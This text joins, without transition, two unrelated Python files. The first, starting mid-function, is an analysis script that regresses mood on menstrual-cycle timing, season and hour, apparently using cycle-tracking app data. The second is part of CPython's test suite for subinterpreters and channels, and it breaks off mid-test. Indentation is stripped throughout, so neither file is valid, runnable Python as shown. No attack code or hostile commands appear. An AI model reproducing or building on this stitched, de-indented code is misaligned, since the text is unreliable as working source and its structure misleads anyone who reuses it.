period_ascii_mapping = (string.ascii_lowercase[:21][::-1] + string.ascii_uppercase)[:41]
assert period_ascii_mapping[20] == 'a'
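                # Illustration of the mapping: date_relative_to_period = -20 -> 'u', -1 -> 'b',
                # 0 -> 'a' (intended as the base level, per the comment above), +1 -> 'A', +20 -> 'T'.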
small_d[covariates_for_regression[i]] = small_d[covariates_for_regression[i]].map(lambda x:period_ascii_mapping[int(x) + 20])
else:
small_d[covariates_for_regression[i]] = small_d[covariates_for_regression[i]].map(lambda x:'STRING_' + str(x))
print("the covariates being used in a mixed model regression are %s" % 'good_mood~%s+(1|user_id_hash)' % ('+'.join(covariates_for_regression)))
print("the head of the dataframe is")
print(small_d.head())
dfr = pandas2ri.py2ri(small_d)
print("done converting to R dataframe")
formula = robjects.Formula('good_mood~%s+(1|user_id_hash)' % ('+'.join(covariates_for_regression)))
print("done converting to R formula")
r_regression_results=lme4.lmer(formula,data=dfr)
print("done fitting regression")
regression_summary = base.summary(r_regression_results)
print("done summarizing regression")
coefs = regression_summary.rx2('coefficients')
pd_coefs = pd.DataFrame(np.array(coefs), columns=list(coefs.colnames), index=list(coefs.rownames))
model_results = {'random_effects_covariance':None,
'random_effects_covariance_errors':None,
'fixed_effects_coefficients':pd_coefs['Estimate'],
'fixed_effects_standard_errors':pd_coefs['Std. Error'],
'ranef':None,
'n_obs':len(small_d),
'n_groups':len(set(small_d['user_id_hash']))}
for k in ['fixed_effects_coefficients', 'fixed_effects_standard_errors']:
print(k)
def process_R_regression_coefs_into_standard_format(x):
if 'Intercept' in x:
return x
elif 'date_relative_to_period' in x:
reverse_mapping = dict(zip(period_ascii_mapping, desired_period_vals))
return 'C(date_relative_to_period)[T.%.1f]' % reverse_mapping[x.replace('date_relative_to_period', '')]
return 'C(' + x.replace('STRING_', ')[T.') + ']'
model_results[k].index = model_results[k].index.map(process_R_regression_coefs_into_standard_format)
for date_relative_to_period in range(-20, 21):
coef_name = 'C(date_relative_to_period)[T.%2.1f]' % date_relative_to_period
if date_relative_to_period == 0:
assert coef_name not in list(model_results[k].index)
else:
assert coef_name in list(model_results[k].index)
print model_results[k].to_string()
print "Successfully performed mixed model regression. Total time taken %2.3f seconds" % (time.time() - t0)
return model_results
def fit_logistic_regression(d):
"""
    Checked. Performs a logistic regression on weekday plus polynomial terms in day of year, period date, and UTC hour.
"""
d = deepcopy(d)
polynomial_order = 5
d['day_of_year'] = d['date'].map(lambda x:datetime.datetime.strptime(x.split()[0], '%Y-%m-%d').timetuple().tm_yday)
d['good_mood'] = d['good_mood'] * 1.
formula_string = 'good_mood ~ weekday'
for poly in range(1, polynomial_order + 1):
d['period_x_%i' % poly] = d['date_relative_to_period'] ** poly
d['day_of_year_%i' % poly] = d['day_of_year'] ** poly
d['utc_hour_%i' % poly] = d['utc_hour'] ** poly
formula_string = formula_string + ' + period_x_%i + day_of_year_%i + utc_hour_%i' % (poly, poly, poly)
model = sm.Logit.from_formula(formula_string, data = d).fit()
print model.summary()
model_results = {'params':model.params, 'pvalues':model.pvalues}
return model_results
def get_covariates_for_regression(symptom_key):
assert type(symptom_key) is str
assert '_versus_' in symptom_key
covariates_for_regression = ['C(year)',
'C(month)',
'C(weekday)',
'C(local_hour)',
"C(date_relative_to_period, Treatment(reference=0))"]
if HEART_SUBSTRING in symptom_key:
# don't need year covariates for heart data.
covariates_for_regression.remove('C(year)')
no_hourly_list = [WEIGHT_SUBSTRING, HEART_SUBSTRING, BBT_SUBSTRING, 'sex*', 'sleep*', 'exercise*']
for substring in no_hourly_list:
if substring in symptom_key:
covariates_for_regression.remove('C(local_hour)')
print 'The regression covariates for %s are' % symptom_key
print covariates_for_regression
return covariates_for_regression
def return_results_of_analyses_as_dictionary(d,
symptom_key,
compute_interactions,
do_regression,
compute_individual_level_effects,
compute_daily_means,
compute_derivative_estimates,
compute_individual_effects_using_median_method,
do_mixed_model_regression,
do_binary_analysis,
do_regressions_of_period_effects,
do_regression_with_alternate_seasonal_specifications,
bootstrap_regression_amplitude_errorbars,
do_regression_with_alternate_period_specifications,
start_day_for_period_individual_effect=None,
end_day_for_period_individual_effect=None,
bootstrap_daily_time_series=False):
"""
performs the basic analyses on a dataframe and returns the results in a dictionary. Checked.
"""
covariates_for_regression = get_covariates_for_regression(symptom_key) # Eg, we do not want to regress on year for HR.
results = {
'take_simple_means_by_group':take_simple_means_by_group(d, remove_individual_means = False),
'take_simple_means_by_group_no_individual_mean':take_simple_means_by_group(d, remove_individual_means = True),
'overall_positive_frac':d['good_mood'].mean(),
'overall_n_obs':len(d),
'overall_n_users':len(set(d['user_id_hash'])),
'unique_user_ids':set(d['user_id_hash']),
'start_day_for_period_individual_effect':start_day_for_period_individual_effect,
'end_day_for_period_individual_effect':end_day_for_period_individual_effect
}
if do_regressions_of_period_effects:
results['period_effects_with_covariates'] = fit_regression_of_period_effects(d, start_day_for_period_individual_effect, end_day_for_period_individual_effect,
min_users_for_group=MIN_USERS_FOR_SUBGROUP,
min_obs_for_group=MIN_OBS_FOR_SUBGROUP)
# put all our bootstrapping in one place.
if bootstrap_regression_amplitude_errorbars or do_regressions_of_period_effects or bootstrap_daily_time_series:
bootstrap_regressions_of_period_effects = do_regressions_of_period_effects
bootstrapped_results = do_all_bootstrapped_analyses(d,
bootstrap_regression_amplitude_errorbars,
bootstrap_regressions_of_period_effects,
bootstrap_daily_time_series,
n_iterates=N_BOOTSTRAP_ITERATES,
regression_amplitude_kwargs={'covariates_for_regression':covariates_for_regression},
period_effects_kwargs={'start_day_for_period_individual_effect':start_day_for_period_individual_effect,
'end_day_for_period_individual_effect':end_day_for_period_individual_effect,
'min_users_for_group':MIN_USERS_FOR_SUBGROUP,
'min_obs_for_group':MIN_OBS_FOR_SUBGROUP,
'specifications':['near_period*C(categorical_age)']})
if do_regressions_of_period_effects:
results['period_effects_with_covariates']['bootstrapped_iterates'] = [a['period_effects_with_covariates'] for a in bootstrapped_results]
results['linear_regression_bootstrapped_iterates'] = [a['linear_regression_bootstrapped_iterates'] for a in bootstrapped_results]
results['bootstrapped_daily_time_series'] = [a['daily_time_series_no_individual_mean'] for a in bootstrapped_results]
if do_regression:
results['linear_regression'] = fit_linear_regression(d, covariates_for_regression)
if do_regression_with_alternate_seasonal_specifications:
results['linear_regression_with_alternate_seasonal_specifications'] = fit_regression_with_alternate_seasonal_specifications(d, covariates_for_regression)
if do_regression_with_alternate_period_specifications:
results['linear_regression_with_alternate_period_specifications'] = fit_regression_with_alternate_period_specifications(d, covariates_for_regression)
if compute_interactions:
results['interaction_between_cycles'] = find_interaction_between_cycles(d,
remove_individual_means = True,
start_day_for_period_individual_effect=start_day_for_period_individual_effect,
end_day_for_period_individual_effect=end_day_for_period_individual_effect)
#results['person_specific_interaction_between_cycles'] = find_person_specific_interactions_between_cycles(d)
if do_mixed_model_regression:
results['mixed_model_regression'] = fit_mixed_model_regression(d, 100000, covariates_for_regression)
if compute_individual_level_effects:
results['individual_level_cycle_effects'] = fast_compute_individual_level_cycle_effects(d,
start_day_for_period_individual_effect,
end_day_for_period_individual_effect)
if compute_daily_means:
results['means_by_date'] = compute_means_by_date(d, remove_individual_means=False)
results['means_by_date_no_individual_mean'] = compute_means_by_date(d, remove_individual_means=True)
if compute_derivative_estimates:
looparound_derivative_estimates, no_looparound_derivative_estimates = \
estimate_derivatives_for_all_four_types_of_cycles(d)
results['derivative_estimates_with_looparound'] = looparound_derivative_estimates
results['derivative_estimates_with_no_looparound'] = no_looparound_derivative_estimates
if compute_individual_effects_using_median_method:
results['individual_effects_using_median_method'] = compute_individual_level_cycle_effects_for_period_by_splitting_into_two_and_taking_median(d)
if do_binary_analysis:
results['binary_analysis'] = compute_diffs_in_binary_variable(d,
remove_individual_means = False,
start_day_for_period_individual_effect=start_day_for_period_individual_effect,
end_day_for_period_individual_effect=end_day_for_period_individual_effect)
results['binary_analysis_no_individual_mean'] = compute_diffs_in_binary_variable(d,
remove_individual_means=True,
start_day_for_period_individual_effect=start_day_for_period_individual_effect,
end_day_for_period_individual_effect=end_day_for_period_individual_effect)
return results
def do_analyses_on_big_symptom_dataframe(all_symptom_groups):
"""
Do regression and simple mean analysis on all symptom data.
Checked.
"""
period_effect_bin_size = 7
# outer loop: symptoms to look at. Save each result in a separate file.
for symptom_group in all_symptom_groups:
# note that symptom_group is a list here, not a string.
all_results = {}
d = dataprocessor.load_dataframe_for_symptom_group(symptom_group, chunks_to_use)
d['season'] = d['month'].map(get_season)
if len(symptom_group) == 1:
assert 'continuous_features' in symptom_group[0]
good_symptom = symptom_group[0]
bad_symptom = 'continuous_features*null'
compute_derivative_estimates = False
if WEIGHT_SUBSTRING in good_symptom:
compute_individual_effects_using_median_method = False
else:
compute_individual_effects_using_median_method = True
else:
good_symptom, bad_symptom = symptom_group
compute_derivative_estimates = False
compute_individual_effects_using_median_method = False
symptom_key = '%s_versus_%s' % (good_symptom, bad_symptom)
all_results[symptom_key] = {}
# compute basic statistics on the users we remove prior to any filtering (this is just a robustness check to show we're not hiding anything and they have cycles too)
all_results[symptom_key]['ALL_OMITTED_USERS_ROBUSTNESS_CHECK_ONLY'] = {}
omitted_data = d.loc[pd.isnull(d['very_active_loggers'])]
print 'Doing analysis on %i rows of omitted data' % len(omitted_data)
all_results[symptom_key]['ALL_OMITTED_USERS_ROBUSTNESS_CHECK_ONLY'][True] = return_results_of_analyses_as_dictionary(omitted_data,
symptom_key=symptom_key,
compute_interactions=False,
do_regression=True,
compute_individual_level_effects=False,
compute_daily_means=True,
compute_derivative_estimates=False,
compute_individual_effects_using_median_method=False,
do_mixed_model_regression=False,
do_binary_analysis=False,
do_regressions_of_period_effects=False,
do_regression_with_alternate_seasonal_specifications=False,
bootstrap_regression_amplitude_errorbars=False,
do_regression_with_alternate_period_specifications=False)
if FILTER_FOR_VERY_ACTIVE_LOGGERS_IN_ALL_ANALYSIS:
print("Warning! Filtering for very active loggers.")
print("Prior to filtering, %i rows, %i users." % (len(d), len(set(d['user_id_hash']))))
d = d.loc[d['very_active_loggers'] == True]
d.index = range(len(d))
print("After filtering, %i rows, %i users." % (len(d), len(set(d['user_id_hash']))))
# First do all results (no substratification)
# first we have to compute the most dramatic period bin.
print("Now computing bin with most dramatic period effect using regression data + bin size of %i" % period_effect_bin_size)
regression_covariates = get_covariates_for_regression(symptom_key)
regression_results = fit_linear_regression(d, regression_covariates)
data = deepcopy(convert_regression_format_to_simple_mean_format(regression_results, 'linear_regression'))
data = data['date_relative_to_period']
start_day_for_period_individual_effect = extract_most_dramatic_period_bin(data, bin_size=period_effect_bin_size)
end_day_for_period_individual_effect = start_day_for_period_individual_effect + period_effect_bin_size
all_results[symptom_key]['no_substratification'] = return_results_of_analyses_as_dictionary(d,
symptom_key=symptom_key,
compute_interactions = True,
do_regression = True,
compute_individual_level_effects = True,
compute_daily_means=True,
compute_derivative_estimates=compute_derivative_estimates,
compute_individual_effects_using_median_method=compute_individual_effects_using_median_method,
do_mixed_model_regression=True,
do_binary_analysis=True,
start_day_for_period_individual_effect=start_day_for_period_individual_effect,
end_day_for_period_individual_effect=end_day_for_period_individual_effect,
do_regressions_of_period_effects=True,
do_regression_with_alternate_seasonal_specifications=True,
bootstrap_regression_amplitude_errorbars=False,
do_regression_with_alternate_period_specifications=True)
# Now look at results broken down by substratification.
for col in COLS_TO_STRATIFY_BY:
substratifications_to_results = {} # dictionary that maps substratification levels to results.
c = Counter(d[col].dropna())
for val in c.keys():
if c[val] < 1000:
print("Skipping %s=%s because too few values (%i)" % (col, val, c[val]))
continue
idxs = d[col] == val
assert np.isnan(idxs).sum() == 0
substratification_d = deepcopy(d.loc[idxs])
print '\nAnalyzing substratification %s = %s (%i points)' % (col, val, idxs.sum())
if col == 'very_active_northern_hemisphere_loggers':
substrat_results = return_results_of_analyses_as_dictionary(substratification_d,
symptom_key=symptom_key,
compute_interactions = True,
do_regression = True,
compute_individual_level_effects = True,
compute_daily_means=True,
compute_derivative_estimates=compute_derivative_estimates,
compute_individual_effects_using_median_method=compute_individual_effects_using_median_method,
do_mixed_model_regression=True,
do_binary_analysis=True,
start_day_for_period_individual_effect=start_day_for_period_individual_effect,
end_day_for_period_individual_effect=end_day_for_period_individual_effect,
do_regressions_of_period_effects=False,
do_regression_with_alternate_seasonal_specifications=True,
bootstrap_regression_amplitude_errorbars=True,
do_regression_with_alternate_period_specifications=True,
bootstrap_daily_time_series=True)
else:
substrat_results = return_results_of_analyses_as_dictionary(substratification_d,
symptom_key=symptom_key,
compute_interactions = False,
do_regression = True,
compute_individual_level_effects = False,
compute_daily_means=True,
compute_derivative_estimates=False,
compute_individual_effects_using_median_method=False,
do_mixed_model_regression=False,
start_day_for_period_individual_effect=start_day_for_period_individual_effect,
end_day_for_period_individual_effect=end_day_for_period_individual_effect,
do_binary_analysis=True,
do_regressions_of_period_effects=False,
do_regression_with_alternate_seasonal_specifications=False,
bootstrap_regression_amplitude_errorbars=False,
do_regression_with_alternate_period_specifications=False)
substratifications_to_results[val] = substrat_results
all_results[symptom_key]['by_' + col] = substratifications_to_results
very_active_logger_string = 'VERY_ACTIVE_LOGGERS_' if FILTER_FOR_VERY_ACTIVE_LOGGERS_IN_ALL_ANALYSIS else ''
file_handle = open(os.path.join(base_results_dir, '%s%s_versus_%s_n_chunks_to_use_%i.pkl' % (very_active_logger_string, good_symptom, bad_symptom, n_chunks_to_use)), 'wb')
cPickle.dump(all_results, file_handle)
file_handle.close()
print("Successfully completed analysis of symptoms.")
def multithreaded_do_analyses_on_big_symptom_dataframe():
"""
Checked. Runs multiple symptom pairs at one time.
"""
raise Exception("This is deprecated!")
n_processes = len(ALL_SYMPTOM_GROUPS)
processes = []
for process_idx in range(n_processes):
pairs_for_process = deepcopy(ALL_SYMPTOM_GROUPS[process_idx::n_processes])
print(pairs_for_process)
p = Process(target=do_analyses_on_big_symptom_dataframe,
kwargs={'all_symptom_groups':pairs_for_process})
processes.append(p)
for process in processes:
process.start()
for process in processes:
process.join()
print("All processes completed successfully")
def get_jobs_that_crashed():
jobs_to_rerun = []
for i in range(len(ALL_SYMPTOM_GROUPS)):
completed_successfully = False
f = open('%s/compare_to_seasonal_cycles_symptom_group_%i.out' % (base_processing_outfile_dir, i))
for line in f:
if 'Successfully completed analysis of symptoms.' in line:
completed_successfully = True
if not completed_successfully:
print("Job %i must be rerun." % i)
jobs_to_rerun.append(i)
else:
print("Job %i finished successfully." % i)
return jobs_to_rerun
def run_single_symptom_group(i):
os.system('nohup python -u compare_to_seasonal_cycles.py %i > %s/compare_to_seasonal_cycles_symptom_group_%i.out &' % (i, base_processing_outfile_dir, i))
if __name__ == '__main__':
os.environ["OMP_NUM_THREADS"]="5"
if len(sys.argv) == 1:
for i in range(len(ALL_SYMPTOM_GROUPS)):
run_single_symptom_group(i)
elif len(sys.argv) == 2:
if sys.argv[1] == 'just_jobs_that_didnt_finish':
jobs_to_rerun = get_jobs_that_crashed()
print "Rerunning jobs"
print(jobs_to_rerun)
for i in jobs_to_rerun:
run_single_symptom_group(i)
else:
i = int(sys.argv[1])
do_analyses_on_big_symptom_dataframe([ALL_SYMPTOM_GROUPS[i]])
else:
raise Exception("must be called with 0 or 1 arguments.")
"""
opposite_symptom_list = [line.split(',') for line in open('clue_opposite_symptom_list.csv').read().split('\n')]
d = pd.read_csv(os.path.join(base_clue_data_dir, 'medium_symptoms.csv'))
users_to_starts = make_users_to_starts()
processes = []
for process_idx in range(len(opposite_symptom_list)):
args = [d, users_to_starts, opposite_symptom_list[process_idx][0], opposite_symptom_list[process_idx][1]]
p = Process(target=fit_model, args=tuple(args))
processes.append(p)
for process in processes:
process.start()
for process in processes:
process.join()
"""
test__xxsubinterpreters.py
from collections import namedtuple
import contextlib
import itertools
import os
import pickle
import sys
from textwrap import dedent
import threading
import time
import unittest
from test import support
from test.support import script_helper
interpreters = support.import_module('_xxsubinterpreters')
##################################
# helpers
def _captured_script(script):
r, w = os.pipe()
indented = script.replace('\n', '\n ')
wrapped = dedent(f"""
import contextlib
with open({w}, 'w') as spipe:
with contextlib.redirect_stdout(spipe):
{indented}
""")
return wrapped, open(r)
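# For illustration (added comment, not part of the test suite): _captured_script("print('spam')")
# returns a script roughly equivalent to
#     import contextlib
#     with open(<write fd>, 'w') as spipe:
#         with contextlib.redirect_stdout(spipe):
#             print('spam')
# plus the read end of the pipe, so _run_output() below can return whatever the script printed.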
def _run_output(interp, request, shared=None):
script, rpipe = _captured_script(request)
with rpipe:
interpreters.run_string(interp, script, shared)
return rpipe.read()
@contextlib.contextmanager
def _running(interp):
r, w = os.pipe()
def run():
interpreters.run_string(interp, dedent(f"""
# wait for "signal"
with open({r}) as rpipe:
rpipe.read()
"""))
t = threading.Thread(target=run)
t.start()
yield
with open(w, 'w') as spipe:
spipe.write('done')
t.join()
#@contextmanager
#def run_threaded(id, source, **shared):
# def run():
# run_interp(id, source, **shared)
# t = threading.Thread(target=run)
# t.start()
# yield
# t.join()
def run_interp(id, source, **shared):
_run_interp(id, source, shared)
def _run_interp(id, source, shared, _mainns={}):
source = dedent(source)
main = interpreters.get_main()
if main == id:
if interpreters.get_current() != main:
raise RuntimeError
# XXX Run a func?
exec(source, _mainns)
else:
interpreters.run_string(id, source, shared)
class Interpreter(namedtuple('Interpreter', 'name id')):
@classmethod
def from_raw(cls, raw):
if isinstance(raw, cls):
return raw
elif isinstance(raw, str):
return cls(raw)
else:
raise NotImplementedError
def __new__(cls, name=None, id=None):
main = interpreters.get_main()
if id == main:
if not name:
name = 'main'
elif name != 'main':
raise ValueError(
'name mismatch (expected "main", got "{}")'.format(name))
id = main
elif id is not None:
if not name:
name = 'interp'
elif name == 'main':
raise ValueError('name mismatch (unexpected "main")')
if not isinstance(id, interpreters.InterpreterID):
id = interpreters.InterpreterID(id)
elif not name or name == 'main':
name = 'main'
id = main
else:
id = interpreters.create()
self = super().__new__(cls, name, id)
return self
# XXX expect_channel_closed() is unnecessary once we improve exc propagation.
@contextlib.contextmanager
def expect_channel_closed():
try:
yield
except interpreters.ChannelClosedError:
pass
else:
assert False, 'channel not closed'
class ChannelAction(namedtuple('ChannelAction', 'action end interp')):
def __new__(cls, action, end=None, interp=None):
if not end:
end = 'both'
if not interp:
interp = 'main'
self = super().__new__(cls, action, end, interp)
return self
def __init__(self, *args, **kwargs):
if self.action == 'use':
if self.end not in ('same', 'opposite', 'send', 'recv'):
raise ValueError(self.end)
elif self.action in ('close', 'force-close'):
if self.end not in ('both', 'same', 'opposite', 'send', 'recv'):
raise ValueError(self.end)
else:
raise ValueError(self.action)
if self.interp not in ('main', 'same', 'other', 'extra'):
raise ValueError(self.interp)
def resolve_end(self, end):
if self.end == 'same':
return end
elif self.end == 'opposite':
return 'recv' if end == 'send' else 'send'
else:
return self.end
def resolve_interp(self, interp, other, extra):
if self.interp == 'same':
return interp
elif self.interp == 'other':
if other is None:
raise RuntimeError
return other
elif self.interp == 'extra':
if extra is None:
raise RuntimeError
return extra
elif self.interp == 'main':
if interp.name == 'main':
return interp
elif other and other.name == 'main':
return other
else:
raise RuntimeError
# Per __init__(), there aren't any others.
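# ChannelState is the expected state of a channel: how many sent items are
# still pending and whether the channel has been closed; incr()/decr()/close()
# return new instances rather than mutating.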
class ChannelState(namedtuple('ChannelState', 'pending closed')):
def __new__(cls, pending=0, *, closed=False):
self = super().__new__(cls, pending, closed)
return self
def incr(self):
return type(self)(self.pending + 1, closed=self.closed)
def decr(self):
return type(self)(self.pending - 1, closed=self.closed)
def close(self, *, force=True):
if self.closed:
if not force or self.pending == 0:
return self
return type(self)(0 if force else self.pending, closed=True)
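# run_action()/_run_action() apply one ChannelAction to a real channel and
# return the resulting expected ChannelState; depending on `hideclosed` and
# the current state, a ChannelClosedError is either swallowed or required.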
def run_action(cid, action, end, state, *, hideclosed=True):
if state.closed:
if action == 'use' and end == 'recv' and state.pending:
expectfail = False
else:
expectfail = True
else:
expectfail = False
try:
result = _run_action(cid, action, end, state)
except interpreters.ChannelClosedError:
if not hideclosed and not expectfail:
raise
result = state.close()
else:
if expectfail:
raise AssertionError('channel use unexpectedly succeeded') # XXX
return result
def _run_action(cid, action, end, state):
if action == 'use':
if end == 'send':
interpreters.channel_send(cid, b'spam')
return state.incr()
elif end == 'recv':
if not state.pending:
try:
interpreters.channel_recv(cid)
except interpreters.ChannelEmptyError:
return state
else:
raise Exception('expected ChannelEmptyError')
else:
interpreters.channel_recv(cid)
return state.decr()
else:
raise ValueError(end)
elif action == 'close':
kwargs = {}
if end in ('recv', 'send'):
kwargs[end] = True
interpreters.channel_close(cid, **kwargs)
return state.close()
elif action == 'force-close':
kwargs = {
'force': True,
}
if end in ('recv', 'send'):
kwargs[end] = True
interpreters.channel_close(cid, **kwargs)
return state.close(force=True)
else:
raise ValueError(action)
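# The clean_up_* helpers below destroy every leftover subinterpreter (except
# main) and every remaining channel; TestBase.tearDown() calls both after
# each test so state never leaks between tests.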
def clean_up_interpreters():
for id in interpreters.list_all():
if id == 0: # main
continue
try:
interpreters.destroy(id)
except RuntimeError:
pass # already destroyed
def clean_up_channels():
for cid in interpreters.channel_list_all():
try:
interpreters.channel_destroy(cid)
except interpreters.ChannelNotFoundError:
pass # already destroyed
class TestBase(unittest.TestCase):
def tearDown(self):
clean_up_interpreters()
clean_up_channels()
##################################
# misc. tests
class IsShareableTests(unittest.TestCase):
def test_default_shareables(self):
shareables = [
# singletons
None,
# builtin objects
b'spam',
'spam',
10,
-10,
]
for obj in shareables:
with self.subTest(obj):
self.assertTrue(
interpreters.is_shareable(obj))
def test_not_shareable(self):
class Cheese:
def __init__(self, name):
self.name = name
def __str__(self):
return self.name
class SubBytes(bytes):
"""A subclass of a shareable type."""
not_shareables = [
# singletons
True,
False,
NotImplemented,
...,
# builtin types and objects
type,
object,
object(),
Exception(),
100.0,
# user-defined types and objects
Cheese,
Cheese('Wensleydale'),
SubBytes(b'spam'),
]
for obj in not_shareables:
with self.subTest(repr(obj)):
self.assertFalse(
interpreters.is_shareable(obj))
class ShareableTypeTests(unittest.TestCase):
def setUp(self):
super().setUp()
self.cid = interpreters.channel_create()
def tearDown(self):
interpreters.channel_destroy(self.cid)
super().tearDown()
def _assert_values(self, values):
for obj in values:
with self.subTest(obj):
interpreters.channel_send(self.cid, obj)
got = interpreters.channel_recv(self.cid)
self.assertEqual(got, obj)
self.assertIs(type(got), type(obj))
# XXX Check the following in the channel tests?
#self.assertIsNot(got, obj)
def test_singletons(self):
for obj in [None]:
with self.subTest(obj):
interpreters.channel_send(self.cid, obj)
got = interpreters.channel_recv(self.cid)
# XXX What about between interpreters?
self.assertIs(got, obj)
def test_types(self):
self._assert_values([
b'spam',
9999,
self.cid,
])
def test_bytes(self):
self._assert_values(i.to_bytes(2, 'little', signed=True)
for i in range(-1, 258))
def test_strs(self):
self._assert_values(['hello world', '你好世界', ''])
def test_int(self):
self._assert_values(itertools.chain(range(-1, 258),
[sys.maxsize, -sys.maxsize - 1]))
def test_non_shareable_int(self):
ints = [
sys.maxsize + 1,
-sys.maxsize - 2,
2**1000,
]
for i in ints:
with self.subTest(i):
with self.assertRaises(OverflowError):
interpreters.channel_send(self.cid, i)
##################################
# interpreter tests
class ListAllTests(TestBase):
def test_initial(self):
main = interpreters.get_main()
ids = interpreters.list_all()
self.assertEqual(ids, [main])
def test_after_creating(self):
main = interpreters.get_main()
first = interpreters.create()
second = interpreters.create()
ids = interpreters.list_all()
self.assertEqual(ids, [main, first, second])
def test_after_destroying(self):
main = interpreters.get_main()
first = interpreters.create()
second = interpreters.create()
interpreters.destroy(first)
ids = interpreters.list_all()
self.assertEqual(ids, [main, second])
class GetCurrentTests(TestBase):
def test_main(self):
main = interpreters.get_main()
cur = interpreters.get_current()
self.assertEqual(cur, main)
self.assertIsInstance(cur, interpreters.InterpreterID)
def test_subinterpreter(self):
main = interpreters.get_main()
interp = interpreters.create()
out = _run_output(interp, dedent("""
import _xxsubinterpreters as _interpreters
cur = _interpreters.get_current()
print(cur)
assert isinstance(cur, _interpreters.InterpreterID)
"""))
cur = int(out.strip())
_, expected = interpreters.list_all()
self.assertEqual(cur, expected)
self.assertNotEqual(cur, main)
class GetMainTests(TestBase):
def test_from_main(self):
[expected] = interpreters.list_all()
main = interpreters.get_main()
self.assertEqual(main, expected)
self.assertIsInstance(main, interpreters.InterpreterID)
def test_from_subinterpreter(self):
[expected] = interpreters.list_all()
interp = interpreters.create()
out = _run_output(interp, dedent("""
import _xxsubinterpreters as _interpreters
main = _interpreters.get_main()
print(main)
assert isinstance(main, _interpreters.InterpreterID)
"""))
main = int(out.strip())
self.assertEqual(main, expected)
class IsRunningTests(TestBase):
def test_main(self):
main = interpreters.get_main()
self.assertTrue(interpreters.is_running(main))
@unittest.skip('Fails on FreeBSD')
def test_subinterpreter(self):
interp = interpreters.create()
self.assertFalse(interpreters.is_running(interp))
with _running(interp):
self.assertTrue(interpreters.is_running(interp))
self.assertFalse(interpreters.is_running(interp))
def test_from_subinterpreter(self):
interp = interpreters.create()
out = _run_output(interp, dedent(f"""
import _xxsubinterpreters as _interpreters
if _interpreters.is_running({interp}):
print(True)
else:
print(False)
"""))
self.assertEqual(out.strip(), 'True')
def test_already_destroyed(self):
interp = interpreters.create()
interpreters.destroy(interp)
with self.assertRaises(RuntimeError):
interpreters.is_running(interp)
def test_does_not_exist(self):
with self.assertRaises(RuntimeError):
interpreters.is_running(1_000_000)
def test_bad_id(self):
with self.assertRaises(ValueError):
interpreters.is_running(-1)
class InterpreterIDTests(TestBase):
def test_with_int(self):
id = interpreters.InterpreterID(10, force=True)
self.assertEqual(int(id), 10)
def test_coerce_id(self):
class Int(str):
def __index__(self):
return 10
id = interpreters.InterpreterID(Int(), force=True)
self.assertEqual(int(id), 10)
def test_bad_id(self):
self.assertRaises(TypeError, interpreters.InterpreterID, object())
self.assertRaises(TypeError, interpreters.InterpreterID, 10.0)
self.assertRaises(TypeError, interpreters.InterpreterID, '10')
self.assertRaises(TypeError, interpreters.InterpreterID, b'10')
self.assertRaises(ValueError, interpreters.InterpreterID, -1)
self.assertRaises(OverflowError, interpreters.InterpreterID, 2**64)
def test_does_not_exist(self):
id = interpreters.channel_create()
with self.assertRaises(RuntimeError):
interpreters.InterpreterID(int(id) + 1) # unforced
def test_str(self):
id = interpreters.InterpreterID(10, force=True)
self.assertEqual(str(id), '10')
def test_repr(self):
id = interpreters.InterpreterID(10, force=True)
self.assertEqual(repr(id), 'InterpreterID(10)')
def test_equality(self):
id1 = interpreters.create()
id2 = interpreters.InterpreterID(int(id1))
id3 = interpreters.create()
self.assertTrue(id1 == id1)
self.assertTrue(id1 == id2)
self.assertTrue(id1 == int(id1))
self.assertTrue(int(id1) == id1)
self.assertTrue(id1 == float(int(id1)))
self.assertTrue(float(int(id1)) == id1)
self.assertFalse(id1 == float(int(id1)) + 0.1)
self.assertFalse(id1 == str(int(id1)))
self.assertFalse(id1 == 2**1000)
self.assertFalse(id1 == float('inf'))
self.assertFalse(id1 == 'spam')
self.assertFalse(id1 == id3)
self.assertFalse(id1 != id1)
self.assertFalse(id1 != id2)
self.assertTrue(id1 != id3)
class CreateTests(TestBase):
def test_in_main(self):
id = interpreters.create()
self.assertIsInstance(id, interpreters.InterpreterID)
self.assertIn(id, interpreters.list_all())
@unittest.skip('enable this test when working on pystate.c')
def test_unique_id(self):
seen = set()
for _ in range(100):
id = interpreters.create()
interpreters.destroy(id)
seen.add(id)
self.assertEqual(len(seen), 100)
def test_in_thread(self):
lock = threading.Lock()
id = None
def f():
nonlocal id
id = interpreters.create()
lock.acquire()
lock.release()
t = threading.Thread(target=f)
with lock:
t.start()
t.join()
self.assertIn(id, interpreters.list_all())
def test_in_subinterpreter(self):
main, = interpreters.list_all()
id1 = interpreters.create()
out = _run_output(id1, dedent("""
import _xxsubinterpreters as _interpreters
id = _interpreters.create()
print(id)
assert isinstance(id, _interpreters.InterpreterID)
"""))
id2 = int(out.strip())
self.assertEqual(set(interpreters.list_all()), {main, id1, id2})
def test_in_threaded_subinterpreter(self):
main, = interpreters.list_all()
id1 = interpreters.create()
id2 = None
def f():
nonlocal id2
out = _run_output(id1, dedent("""
import _xxsubinterpreters as _interpreters
id = _interpreters.create()
print(id)
"""))
id2 = int(out.strip())
t = threading.Thread(target=f)
t.start()
t.join()
self.assertEqual(set(interpreters.list_all()), {main, id1, id2})
def test_after_destroy_all(self):
before = set(interpreters.list_all())
# Create 3 subinterpreters.
ids = []
for _ in range(3):
id = interpreters.create()
ids.append(id)
# Now destroy them.
for id in ids:
interpreters.destroy(id)
# Finally, create another.
id = interpreters.create()
self.assertEqual(set(interpreters.list_all()), before | {id})
def test_after_destroy_some(self):
before = set(interpreters.list_all())
# Create 3 subinterpreters.
id1 = interpreters.create()
id2 = interpreters.create()
id3 = interpreters.create()
# Now destroy 2 of them.
interpreters.destroy(id1)
interpreters.destroy(id3)
# Finally, create another.
id = interpreters.create()
self.assertEqual(set(interpreters.list_all()), before | {id, id2})
class DestroyTests(TestBase):
def test_one(self):
id1 = interpreters.create()
id2 = interpreters.create()
id3 = interpreters.create()
self.assertIn(id2, interpreters.list_all())
interpreters.destroy(id2)
self.assertNotIn(id2, interpreters.list_all())
self.assertIn(id1, interpreters.list_all())
self.assertIn(id3, interpreters.list_all())
def test_all(self):
before = set(interpreters.list_all())
ids = set()
for _ in range(3):
id = interpreters.create()
ids.add(id)
self.assertEqual(set(interpreters.list_all()), before | ids)
for id in ids:
interpreters.destroy(id)
self.assertEqual(set(interpreters.list_all()), before)
def test_main(self):
main, = interpreters.list_all()
with self.assertRaises(RuntimeError):
interpreters.destroy(main)
def f():
with self.assertRaises(RuntimeError):
interpreters.destroy(main)
t = threading.Thread(target=f)
t.start()
t.join()
def test_already_destroyed(self):
id = interpreters.create()
